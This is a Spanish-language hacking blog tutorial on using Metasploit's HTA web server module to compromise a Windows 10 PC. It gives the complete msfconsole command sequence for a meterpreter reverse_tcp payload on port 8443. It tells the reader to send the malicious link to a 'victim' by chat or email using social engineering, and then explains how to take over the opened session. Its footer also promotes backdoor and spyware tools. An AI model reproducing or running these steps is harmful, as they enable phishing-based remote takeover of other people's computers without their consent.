Este módulo aloja una HTML Application (HTA) que, cuando se abre, ejecutará una payload (carga útil) a través de Powershell. Cuando un usuario navega hacia el archivo HTA, Windows te alertará dos veces antes de que se ejecute la carga útil
Objetivos de explotación
- Windows Todas las versiones
- Atacante: Parrot OS (Puedes usar Kali Linux u otra de las 5 mejores distros Linux para pruebas de seguridad)
- PC de la víctima: Windows 10
Hacking con HTA Web Server
- Abre el terminal e inicia el Metasploit Framework (MSF):
msfconsole
- Creamos la payload con los siguientes comandos:
use exploit/windows/misc/hta_server
set lhost <tu_IP>
set srvhost <tu_IP>
set payload windows/meterpreter/reverse_tcp
set lport 8443
exploit
Para conocer tu IP abre una nueva terminal y ejecuta el comando ifconfig
.
- Lo hecho anteriormente creará un URL con el archivo infeccioso. Envía el enlace del servidor a la víctima por chat o correo electrónico o cualquier técnica de ingeniería social.
- Cuando el ordenador víctima navegue hacía tu enlace, descargará un archivo del tipo
abcxyz.hta
, y cuando la víctima haga clic en él obtendrás la sesión de meterpreter.
- Ahora tienes acceso a la PC de las víctimas. Utiliza el comando “
sessions -i
” y el número de sesión para conectarte a la sesión.
Recomendaciones similares:
- Hacking Windows para Pentester: Certutil
- BetterBackdoor: Backdoor Multifuncional para Windows
- sAINT: Spyware para sistemas Windows escrito en Java
- Incrustar Meterpreter en cualquier Android APK
Si te gusta el contenido y deseas apoyar a la mejora del sitio web, considera hacer una contribución ¡haciendo clic aquí por favor!. ¡NO ES OBLIGATORIO, GRACIAS! :’)
¿Te ha gustado este artículo? Sigue este blog en su fanpage de Facebook, Twitter, Instagram y/o YouTube para que no te pierdas del mejor contenido informático y hacking!